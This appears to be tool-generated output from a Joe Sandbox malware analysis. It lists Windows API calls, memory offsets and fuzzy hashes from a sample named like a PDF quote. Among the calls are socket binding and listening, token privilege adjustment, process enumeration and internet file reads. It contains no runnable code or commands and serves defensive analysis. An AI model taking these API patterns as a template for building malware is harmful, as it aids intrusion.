                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf
                                                                    • String ID: Oa
                                                                    • API String ID: 674341424-3945284152
                                                                    • Opcode ID: f17fb404a457b3be0f2f6f873c0408fa44560305d36a04914cd89dd4a337eb60
                                                                    • Instruction ID: 93e4366a697392b2c3721cf92274a6711aaa69671a1d0f4f64e038373e69e9fb
                                                                    • Opcode Fuzzy Hash: f17fb404a457b3be0f2f6f873c0408fa44560305d36a04914cd89dd4a337eb60
                                                                    • Instruction Fuzzy Hash: 3922B1716083019FC764DF24C891BAFB7E4BF89704F14991DF49AAB291DB71EA04CB92
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00ED63F2
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED6401
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00ED641D
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00ED642C
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED6446
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00ED645A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: d0247839e906fd216f659511f553e447e6b1a328111617e9a5cd0db7aacd8844
                                                                    • Instruction ID: 68614cdf43b29b4dccb7d6c104ce666fa22b1c034bea6eb5949ba3bec30d45f1
                                                                    • Opcode Fuzzy Hash: d0247839e906fd216f659511f553e447e6b1a328111617e9a5cd0db7aacd8844
                                                                    • Instruction Fuzzy Hash: 8D21D0312002049FCB04EF64D885A6EB7F9EF48724F14916AF866BB392CB70AD05CB51
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E619FA
                                                                    • GetSysColor.USER32(0000000F), ref: 00E61A4E
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00E61A61
                                                                      • Part of subcall function 00E61290: DefDlgProcW.USER32(?,00000020,?), ref: 00E612D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ColorProc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 3744519093-0
                                                                    • Opcode ID: 14c97eceeef103ed6b43da1b96b0944451afb31e72c83374fdd1de00a244b970
                                                                    • Instruction ID: 1c38ecff9bf262456c89d2e824a0e48e907ee8b92dc4a3f9cc20afe8ed477cc1
                                                                    • Opcode Fuzzy Hash: 14c97eceeef103ed6b43da1b96b0944451afb31e72c83374fdd1de00a244b970
                                                                    • Instruction Fuzzy Hash: CCA15970186588BEDA3AAA69BD48DFF359DDB813CEB1C315DF002F51D2DA249D01D272
                                                                    APIs
                                                                      • Part of subcall function 00ED7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00ED7ECB
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00ED68B4
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED68DD
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00ED6916
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED6923
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00ED6937
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 99427753-0
                                                                    • Opcode ID: 8de5ade2688828787691503490b08419f41b49482f29561610caecb721c946a4
                                                                    • Instruction ID: f29e96dca5248595b92208cda6d985db7b0f822abfd61a58c39a6fc21c4a42c1
                                                                    • Opcode Fuzzy Hash: 8de5ade2688828787691503490b08419f41b49482f29561610caecb721c946a4
                                                                    • Instruction Fuzzy Hash: 2C41F035A80214AFEB10AF64EC86F6E77E8DF48760F049159F90ABB3C3CA709D018791
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: 3dc38b214c06575f6a9960fe0d63dbee9dbde7c4f25ffe470e92a5d43f41e27f
                                                                    • Instruction ID: 10d0f0bebf155bbb56c16a6b00eee60ba352fc1024716a3e0becbe324e9a4b19
                                                                    • Opcode Fuzzy Hash: 3dc38b214c06575f6a9960fe0d63dbee9dbde7c4f25ffe470e92a5d43f41e27f
                                                                    • Instruction Fuzzy Hash: 56112232300A586FE7205F27DC84B6A77D8FF8436AF049028F857F7281CB309C428691
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EA1CB7,?), ref: 00EDC112
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EDC124
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                    • API String ID: 2574300362-1816364905
                                                                    • Opcode ID: e0292c0ad91ddf88ab152383532fe394a278c707459a790d6dbb7e2bca308d4e
                                                                    • Instruction ID: d28abfbd57a786315176019dc2345e707a04f09260db2c5c3d626e9ef4855cd4
                                                                    • Opcode Fuzzy Hash: e0292c0ad91ddf88ab152383532fe394a278c707459a790d6dbb7e2bca308d4e
                                                                    • Instruction Fuzzy Hash: B0E0C278202737CFCB205F2AD859A42B6F8EF08788B60943AE885F6351E774D886C750
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00EDEF51
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00EDEF5F
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00EDF01F
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EDF02E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                    • String ID:
                                                                    • API String ID: 2576544623-0
                                                                    • Opcode ID: 9f71fc1c248a7b997eb5ef6ccbbfa10dd84429c89b17962076e17806a3e525a1
                                                                    • Instruction ID: b903f2da4ad7cad80abf1e63c6c847ccea84b5a2b0d41babf53c889bbd7dce81
                                                                    • Opcode Fuzzy Hash: 9f71fc1c248a7b997eb5ef6ccbbfa10dd84429c89b17962076e17806a3e525a1
                                                                    • Instruction Fuzzy Hash: 825170715083019FD310EF20EC85E6BB7E8FF94754F14592EF496A7292DB70A909CB92
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EBE93A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 489188cc5aa95f47f39f4e6cb71634ab0864a77d2994bde4e49ebda20dfa8b68
                                                                    • Instruction ID: 4df61d91cdde22661e0783ba732f08b4d5ab23f1d5f3852afdfa06b53d5d9fbd
                                                                    • Opcode Fuzzy Hash: 489188cc5aa95f47f39f4e6cb71634ab0864a77d2994bde4e49ebda20dfa8b68
                                                                    • Instruction Fuzzy Hash: 5F321675A00605DFC728DF29C4819AAB7F1FF48320B15D56EE59AEB3A1E770E941CB40
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00ED1920,00000000), ref: 00ED24F7
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00ED252E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: b4d0cc8ee95001d13a5773ff8bf2a4226c93c8c0c02e80d66e90c9abccdea5f5
                                                                    • Instruction ID: e4a4a022c8f7a6852e8b3cb96ee2b123aae06fb4b63a9901e9f41a1e1c2370b1
                                                                    • Opcode Fuzzy Hash: b4d0cc8ee95001d13a5773ff8bf2a4226c93c8c0c02e80d66e90c9abccdea5f5
                                                                    • Instruction Fuzzy Hash: AA41D671504209BFEB20DE95DC85EBBB7ECEB50328F10906FFB05B6240DA719E429651
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00ECB3CF
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00ECB429
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00ECB476
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: 3c90efb416a542a3f81741443b26c886fc19ca64e1fe80f6393742c5ea57c33c
                                                                    • Instruction ID: 35683c9310c4c46d34ef620d4d07367d5088b6220cd84e05108c6cf4b4f87579
                                                                    • Opcode Fuzzy Hash: 3c90efb416a542a3f81741443b26c886fc19ca64e1fe80f6393742c5ea57c33c
                                                                    • Instruction Fuzzy Hash: 84212F35A00518DFCB00EFA5D895EEDBBF8FF48314F1480A9F905AB252DB319915CB51
                                                                    APIs
                                                                      • Part of subcall function 00E80F36: std::exception::exception.LIBCMT ref: 00E80F6C
                                                                      • Part of subcall function 00E80F36: __CxxThrowException@8.LIBCMT ref: 00E80F81
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EB8AED
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EB8B1A
                                                                    • GetLastError.KERNEL32 ref: 00EB8B27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: dc270b37968586151b6d6e148525cdb0dac1d5d1d28f4ca117c7fc8888c6e0eb
                                                                    • Instruction ID: d16457c51a36df3ef2f0da61477672c9794c215e3d840c9514dde67433f6de1a
                                                                    • Opcode Fuzzy Hash: dc270b37968586151b6d6e148525cdb0dac1d5d1d28f4ca117c7fc8888c6e0eb
                                                                    • Instruction Fuzzy Hash: 9711BCB1514209AFD728AF64DCC5D6BB7FCEB44314B20816EF44AA7251EB30AC04CB60
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC4A31
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EC4A48
                                                                    • FreeSid.ADVAPI32(?), ref: 00EC4A58
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: a01259f7bfe76d46714bf2242cf00ece21c656df2efaac759fd1e46e201f2fc4
                                                                    • Instruction ID: 1a2acf09682814591a42898e801ea89a1dbc1d8febd244549e5e817915fceff1
                                                                    • Opcode Fuzzy Hash: a01259f7bfe76d46714bf2242cf00ece21c656df2efaac759fd1e46e201f2fc4
                                                                    • Instruction Fuzzy Hash: 54F04975A5130CBFDF00DFF0DD89AAEBBBCEF08211F0044A9F901E6581E6716A089B50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7859ee62a78184b87ca47419ff935a09d8df8fe0758f15a10607fb9d9ebc6642
                                                                    • Instruction ID: 7cc56f57989c79aa2f50d09847423c7b40d12a74a998b816999e2cfa1864253d
                                                                    • Opcode Fuzzy Hash: 7859ee62a78184b87ca47419ff935a09d8df8fe0758f15a10607fb9d9ebc6642
                                                                    • Instruction Fuzzy Hash: DE22CF78A40215CFDB24DF64E480AAEB7F1FF09354F14A069E85ABB391E730AD45CB91
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00ECC787
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECC7B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: a0a8d834765a2263a6213770129885f8bff338c135fd4d5cd81eca3c04cdc1ea
                                                                    • Instruction ID: 0467e55bdb140bbcfeb12367ca0208719a7056dc814ef90a97e7cb99890b6b07
                                                                    • Opcode Fuzzy Hash: a0a8d834765a2263a6213770129885f8bff338c135fd4d5cd81eca3c04cdc1ea
                                                                    • Instruction Fuzzy Hash: 7D11A1326002049FD710DF69D895E6AF7E8FF84324F04851EF9A9EB2A1DB30AC05CB81
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00ED957D,?,00EEFB84,?), ref: 00ECA121
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00ED957D,?,00EEFB84,?), ref: 00ECA133
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 640793344d1b05d500195a9967e745a8ec7b063c3f59d01f6a368bc3121b4456
                                                                    • Instruction ID: d6499a28bcdd3ce8e0ffddf69263bfcc8f5f8d48fdfda979bdc15ab7cd625835
                                                                    • Opcode Fuzzy Hash: 640793344d1b05d500195a9967e745a8ec7b063c3f59d01f6a368bc3121b4456
                                                                    • Instruction Fuzzy Hash: 08F0E23510522DBBDB209FA4CC48FEA73ADFF08361F044269F909E6181D6309944CBA1
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EB8631), ref: 00EB8508
                                                                    • CloseHandle.KERNEL32(?,?,00EB8631), ref: 00EB851A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: a2b8489b61115e92f2e157ee33d9f74a8363df0e775075579e70a8b94fd315c9
                                                                    • Instruction ID: 6ee8f05f6360f00688fcfeaac5e0e70fa796bf8123d96422b04d38ff2534ed15
                                                                    • Opcode Fuzzy Hash: a2b8489b61115e92f2e157ee33d9f74a8363df0e775075579e70a8b94fd315c9
                                                                    • Instruction Fuzzy Hash: A4E04632004600AEE7212B21EC08D777BEDEB403147148829F59A90470DB22ACA4DB50
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E88ED7,?,?,?,00000001), ref: 00E8A2DA
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E8A2E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 9aec236f3c24e17b3e87abc6b4c27403f26760172f5c46f87ec55991a42bc4f6
                                                                    • Instruction ID: 11d2ef25b2e42b5f8b5f6bf0503b1257fa8a0efcfcb624beec63f509b019a495
                                                                    • Opcode Fuzzy Hash: 9aec236f3c24e17b3e87abc6b4c27403f26760172f5c46f87ec55991a42bc4f6
                                                                    • Instruction Fuzzy Hash: CFB0923105424CAFCA002B92EC49B883F68EB44AA2F404020F60D98464CB6255548A91
                                                                    Memory Dump Source
